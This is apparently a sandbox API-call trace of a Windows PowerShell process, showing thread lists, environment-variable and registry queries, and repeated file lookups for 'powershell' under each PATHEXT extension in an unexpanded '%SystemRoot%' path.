	[0544.830] SetEvent (hEvent=0x300) returned 1
	[0544.832] SetEvent (hEvent=0x1c8) returned 1
	[0544.833] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0545.859] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0545.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.859] CoTaskMemFree (pv=0x3adda0) 
	[0545.860] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d758 | out: phkResult=0x14d758*=0x354) returned 0x0
	[0545.860] RegQueryValueExW (in: hKey=0x354, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14d6dc, lpData=0x0, lpcbData=0x14d6d8*=0x0 | out: lpType=0x14d6dc*=0x0, lpData=0x0, lpcbData=0x14d6d8*=0x0) returned 0x2

Thread:
	id = 354
	os_tid = 0xe30


Thread:
	id = 358
	os_tid = 0xe54


Thread:
	id = 759
	os_tid = 0x1774


Thread:
	id = 761
	os_tid = 0x1784


Thread:
	id = 773
	os_tid = 0x17d8


Thread:
	id = 787
	os_tid = 0xad8


Thread:
	id = 794
	os_tid = 0x14f8

	[0456.218] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0502.620] LocalFree (hMem=0x3372c0) returned 0x0
	[0502.620] CloseHandle (hObject=0x1c8) returned 1
	[0502.620] CloseHandle (hObject=0x13) returned 1
	[0502.621] CloseHandle (hObject=0xf) returned 1
	[0502.622] RegCloseKey (hKey=0x300) returned 0x0
	[0502.622] RegCloseKey (hKey=0x2fc) returned 0x0
	[0502.622] RegCloseKey (hKey=0x2f8) returned 0x0
	[0502.622] LocalFree (hMem=0x337290) returned 0x0
	[0502.622] RegCloseKey (hKey=0x320) returned 0x0
	[0508.455] RegCloseKey (hKey=0x320) returned 0x0
	[0512.702] RegCloseKey (hKey=0x320) returned 0x0
	[0533.995] RegCloseKey (hKey=0x390) returned 0x0
	[0533.995] RegCloseKey (hKey=0x38c) returned 0x0
	[0533.995] RegCloseKey (hKey=0x368) returned 0x0
	[0533.996] RegCloseKey (hKey=0x3a4) returned 0x0
	[0533.996] RegCloseKey (hKey=0x384) returned 0x0
	[0533.996] RegCloseKey (hKey=0x380) returned 0x0
	[0533.996] RegCloseKey (hKey=0x37c) returned 0x0
	[0533.996] RegCloseKey (hKey=0x378) returned 0x0
	[0533.997] RegCloseKey (hKey=0x374) returned 0x0
	[0533.997] RegCloseKey (hKey=0x370) returned 0x0
	[0533.997] RegCloseKey (hKey=0x36c) returned 0x0
	[0533.997] RegCloseKey (hKey=0x344) returned 0x0
	[0533.997] RegCloseKey (hKey=0x3a0) returned 0x0
	[0533.997] RegCloseKey (hKey=0x39c) returned 0x0
	[0533.998] RegCloseKey (hKey=0x364) returned 0x0
	[0533.998] RegCloseKey (hKey=0x360) returned 0x0
	[0533.998] RegCloseKey (hKey=0x35c) returned 0x0
	[0533.998] RegCloseKey (hKey=0x358) returned 0x0
	[0533.998] RegCloseKey (hKey=0x354) returned 0x0
	[0533.999] RegCloseKey (hKey=0x350) returned 0x0
	[0533.999] RegCloseKey (hKey=0x34c) returned 0x0
	[0533.999] RegCloseKey (hKey=0x348) returned 0x0
	[0533.999] RegCloseKey (hKey=0x398) returned 0x0
	[0533.999] RegCloseKey (hKey=0x338) returned 0x0
	[0534.000] RegCloseKey (hKey=0x334) returned 0x0
	[0534.000] RegCloseKey (hKey=0x330) returned 0x0
	[0534.000] RegCloseKey (hKey=0x32c) returned 0x0
	[0534.000] RegCloseKey (hKey=0x328) returned 0x0
	[0534.000] RegCloseKey (hKey=0x324) returned 0x0
	[0534.001] RegCloseKey (hKey=0x1c8) returned 0x0
	[0534.001] RegCloseKey (hKey=0x300) returned 0x0
	[0534.001] RegCloseKey (hKey=0x394) returned 0x0
	[0534.001] RegCloseKey (hKey=0x320) returned 0x0
	[0564.075] RegCloseKey (hKey=0x354) returned 0x0

Thread:
	id = 901
	os_tid = 0x1338


Thread:
	id = 1053
	os_tid = 0x1438

	[0546.682] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0546.686] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0546.691] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0546.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.692] CoTaskMemFree (pv=0x3adda0) 
	[0546.693] VirtualQuery (in: lpAddress=0x1c95db40, lpBuffer=0x1c95ea00, dwLength=0x30 | out: lpBuffer=0x1c95ea00*(BaseAddress=0x1c95d000, AllocationBase=0x1bfd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0546.696] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0546.697] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.697] CoTaskMemFree (pv=0x3adda0) 
	[0546.699] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0546.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.700] CoTaskMemFree (pv=0x3adda0) 
	[0546.703] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0546.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.703] CoTaskMemFree (pv=0x3adda0) 
	[0547.635] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0547.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.635] CoTaskMemFree (pv=0x3adda0) 
	[0547.640] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0547.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.640] CoTaskMemFree (pv=0x3adda0) 
	[0547.642] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0547.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.642] CoTaskMemFree (pv=0x3adda0) 
	[0547.650] VirtualQuery (in: lpAddress=0x1c95ddf0, lpBuffer=0x1c95ecb0, dwLength=0x30 | out: lpBuffer=0x1c95ecb0*(BaseAddress=0x1c95d000, AllocationBase=0x1bfd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0547.651] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0547.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.651] CoTaskMemFree (pv=0x3adda0) 
	[0547.654] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0547.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.654] CoTaskMemFree (pv=0x3adda0) 
	[0547.654] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0547.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.654] CoTaskMemFree (pv=0x3adda0) 
	[0547.655] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0547.656] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.656] CoTaskMemFree (pv=0x3adda0) 
	[0547.661] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0547.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.661] CoTaskMemFree (pv=0x3adda0) 
	[0549.631] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0549.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.631] CoTaskMemFree (pv=0x3adda0) 
	[0549.633] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0549.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.633] CoTaskMemFree (pv=0x3adda0) 
	[0549.634] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0549.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.634] CoTaskMemFree (pv=0x3adda0) 
	[0549.636] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0549.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.636] CoTaskMemFree (pv=0x3adda0) 
	[0549.638] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0549.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.638] CoTaskMemFree (pv=0x3adda0) 
	[0549.639] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0549.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.640] CoTaskMemFree (pv=0x3adda0) 
	[0549.641] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0549.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.642] CoTaskMemFree (pv=0x3adda0) 
	[0549.660] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0549.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.660] CoTaskMemFree (pv=0x3adda0) 
	[0553.209] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0553.209] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0553.209] CoTaskMemFree (pv=0x3adda0) 
	[0553.212] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0553.212] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0553.213] CoTaskMemFree (pv=0x3adda0) 
	[0553.213] CoTaskMemAlloc (cb=0x128) returned 0x3831c0
	[0553.213] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3831c0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0553.213] CoTaskMemFree (pv=0x3831c0) 
	[0553.218] CoTaskMemAlloc (cb=0x20e) returned 0x3ea7c0
	[0553.218] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3ea7c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0553.218] CoTaskMemFree (pv=0x3ea7c0) 
	[0553.222] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0553.223] SetErrorMode (uMode=0x1) returned 0x1
	[0553.226] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0555.371] SetErrorMode (uMode=0x1) returned 0x1
	[0555.372] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0555.372] SetErrorMode (uMode=0x1) returned 0x1
	[0555.373] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0555.381] SetErrorMode (uMode=0x1) returned 0x1
	[0555.382] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0555.383] SetErrorMode (uMode=0x1) returned 0x1
	[0555.383] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0555.391] SetErrorMode (uMode=0x1) returned 0x1
	[0555.392] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0555.392] SetErrorMode (uMode=0x1) returned 0x1
	[0555.392] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0555.400] SetErrorMode (uMode=0x1) returned 0x1
	[0555.402] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0555.402] SetErrorMode (uMode=0x1) returned 0x1
	[0555.402] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0557.360] SetErrorMode (uMode=0x1) returned 0x1
	[0557.362] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0557.362] SetErrorMode (uMode=0x1) returned 0x1
	[0557.362] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0557.370] SetErrorMode (uMode=0x1) returned 0x1
	[0557.371] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0557.371] SetErrorMode (uMode=0x1) returned 0x1
	[0557.371] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0557.379] SetErrorMode (uMode=0x1) returned 0x1
	[0557.380] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0557.380] SetErrorMode (uMode=0x1) returned 0x1
	[0557.381] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0557.388] SetErrorMode (uMode=0x1) returned 0x1
	[0557.390] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0557.390] SetErrorMode (uMode=0x1) returned 0x1
	[0557.390] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0557.398] SetErrorMode (uMode=0x1) returned 0x1
	[0557.399] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0557.399] SetErrorMode (uMode=0x1) returned 0x1
	[0557.399] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0559.311] SetErrorMode (uMode=0x1) returned 0x1
	[0559.312] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0559.312] SetErrorMode (uMode=0x1) returned 0x1
	[0559.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0559.321] SetErrorMode (uMode=0x1) returned 0x1
	[0559.323] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0559.323] SetErrorMode (uMode=0x1) returned 0x1
	[0559.323] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0559.333] SetErrorMode (uMode=0x1) returned 0x1
	[0559.334] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0559.334] SetErrorMode (uMode=0x1) returned 0x1
	[0559.334] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0559.343] SetErrorMode (uMode=0x1) returned 0x1
	[0559.344] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0559.344] SetErrorMode (uMode=0x1) returned 0x1
	[0559.344] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0559.352] SetErrorMode (uMode=0x1) returned 0x1
	[0559.353] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0559.354] SetErrorMode (uMode=0x1) returned 0x1
	[0559.354] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.955] SetErrorMode (uMode=0x1) returned 0x1
	[0560.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.957] SetErrorMode (uMode=0x1) returned 0x1
